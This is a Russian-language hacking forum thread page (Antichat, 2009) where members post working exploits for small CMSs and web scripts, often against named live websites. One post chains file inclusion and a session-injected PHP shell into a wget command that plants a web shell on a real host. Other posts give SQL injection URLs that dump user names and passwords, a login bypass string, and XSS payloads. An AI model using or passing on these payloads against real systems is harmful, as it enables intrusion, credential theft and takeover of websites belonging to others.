ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 09.11.2009, 18:43
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

SkaDate social networking software

Код:
http://com.skadate.com
dork: "SkaDate social networking software" filetype:php
Уязвим параметр language_id=[LFI], запоминается в куках.

/inc/class.language.php
PHP код:
function Language()
    {
        if( 
$_GET['language_id'] )
        {
            
$this->curr_lang_id $_GET['language_id'];
            
setcookie'language_id'$_COOKIE['language_id'], time()-1PATH_HOME );
            
setcookie'language_id'$_GET['language_id'], time()+2592000PATH_HOME );
        }
        elseif( 
$_COOKIE['language_id'] )
        {
            
$this->curr_lang_id $_COOKIE['language_id'];
        }
        else
        {
            
$this->curr_lang_id getConfig'def_lang_id' );
        } 
Находим инклуд
http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00

Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494.

Ищем сессию в /tmp/.
http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00
Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее.

Теперь сессия запомнилась в куках и инклудится на экран.

Льем минишелл в сессию
http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?>

Выполняем команду и льем минишелл для следующей команды
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id

Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги.
Абсолютный путь тоже виден, льем шелл.

http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php

=======
Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990
 
Ответить с цитированием

  #182  
Старый 09.11.2009, 20:21
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

PHP-Fusion
Bug:SQL inkection

Exploit:
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id= 5+union+all+select+1,2,user_name,4,5,6,7+from+secu rity_users--


Код:
http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7+from+security_users--
выводит в Comments
 
Ответить с цитированием

  #183  
Старый 10.11.2009, 00:38
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

The DBS, v0.8.0.0 beta r1.

Файл comment.php

PHP код:
$pid $_GET['pid'];
        
$hLevel 0;
    }

    
// Run security checks on the post we are commenting on, to make sure we are allowed to comment on it
    
$EntryQuery "SELECT * FROM posts WHERE `pid` = $pid"
http://localhost/dbs/comment.php?pid=-1+union+select+1,version(),3,4,5,6,7,8,9--
 
Ответить с цитированием

From RoA with love
  #184  
Старый 10.11.2009, 07:48
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию From RoA with love

Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)

Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).
Цитата:
<script>alert();</script>
И отправляем.

/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message:
Цитата:
<script>alert();</script>
Пассивная XSS

Цитата:
/index.php?action=viewthread&thread_id="><script>al ert()</script>
From RoA with love
 
Ответить с цитированием

  #185  
Старый 10.11.2009, 14:57
Аватар для [x60]unu
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

idesk

Bug - SQL injection
Exploit:
/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8--
or
1+UNION+SELECT+0,0,0,@@VERSION,0,0,0,0,0--

Пример на сайте разработчика)))

Код:
http://www.nicecoder.com/support/download.php?cat_id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8/*
Дополнение от меня (автором данной баги не была указана такая информация ---

idesk - table
таблица idesk_user ((user_name, password)
пример

сайт разработчика -
Код:
http://idesk.ranacorp.com/download.php?cat_id=1+UNION+SELECT+0,0,0,concat_ws(0x3a,user_name,password,last_login),0,0,0,0,0+from+idesk_user--

Последний раз редактировалось [x60]unu; 10.11.2009 в 17:23..
 
Ответить с цитированием

  #186  
Старый 10.11.2009, 18:40
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Simple PHP Agenda
http://sourceforge.net/projects/php-agenda/
SQL

edit_event.php
PHP код:
if (isset ($_GET["eventid"])) {
    
$eventid mysql_real_escape_string($_GET["eventid"]);
    
/* Get activity information */
    
if ($singleAgenda)
        
$sql "select * from events where id=$eventid";
    else
        
$sql "select * from events where id=$eventid and user_id=" $session->id
http://localhost/php-agenda-2.2.7/edit_event.php?eventid=-1+union+select+1,2,3,version(),user(),6,7,8,9--
 
Ответить с цитированием

  #187  
Старый 11.11.2009, 07:27
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

KubeBlog

Раскрытие путей.
/post.php?i[]=1
content.php?i[]=1
?m=11&y[]=2009
?m[]=11&y=2009

Пассивная XSS

/login.php?ref=%22%3E%3Cscript%3Ealert();%3C/script%3E

Последний раз редактировалось Ctacok; 11.11.2009 в 07:33..
 
Ответить с цитированием

  #188  
Старый 11.11.2009, 20:14
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

The Rat CMS
http://downloads.sourceforge.net/the-rat-cms

обход авторизации

login.php
PHP код:
$userId   $_POST['txtUserId'];
$password $_POST['txtPassword'];

// check if the user id and password combination exist in database
$sql "SELECT user_id 
        FROM tbl_auth_user
        WHERE user_id = '
$userId' AND user_password = PASSWORD('$password')";

$result mysql_query($sql) or die('Query failed. ' mysql_error()); 

if (
mysql_num_rows($result) == 1) {
    
// the user id and password match, 
    // set the session
    
$_SESSION['db_is_logged_in'] = true;
    
    
// after login we move to the main page
    
header('Location: main.php');
    exit;
} else {
    
$errorMessage 'Sorry, wrong user id / password';

User Id : 1' or 1=1 limit 0,1 --
Password : any


SQL, XSS


http://www.opennet.ru/base/netsoft/1214498363_15515.txt.html
 
Ответить с цитированием

  #189  
Старый 12.11.2009, 01:17
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

IF CMS version 2.0.7 SQL injection

Уязвимость хранится в скрипте frame.php:

PHP код:
...
$id $_GET['id'];
... 
PHP код:
...
$result $dbi->sql_query("SELECT ban_trgt FROM ".$table->get('banner')." WHERE id_ban='$id'");
... 
Реализация:

Код:
localhost/ifcms/frame.php?id=[SQL]
Для успешной реализации требуется magic_quotes = OFF.
oRB, благодарю за доолнение.

Последний раз редактировалось Ins3t; 12.11.2009 в 20:52..
 
Ответить с цитированием

  #190  
Старый 12.11.2009, 23:35
Аватар для Ins3t
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

Elusive CMS SQL injection

Уязвим скрипт download.php

PHP код:
...
$query "SELECT * FROM incomming where id='$id'";
$result mysql_query($query) or die("Query failed");
... 
Реализация:
Код:
localhost/download.php?id=[SQL]
Для успешной реализации - magic_quotes_gpc = off

Последний раз редактировалось Ins3t; 13.11.2009 в 00:52..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ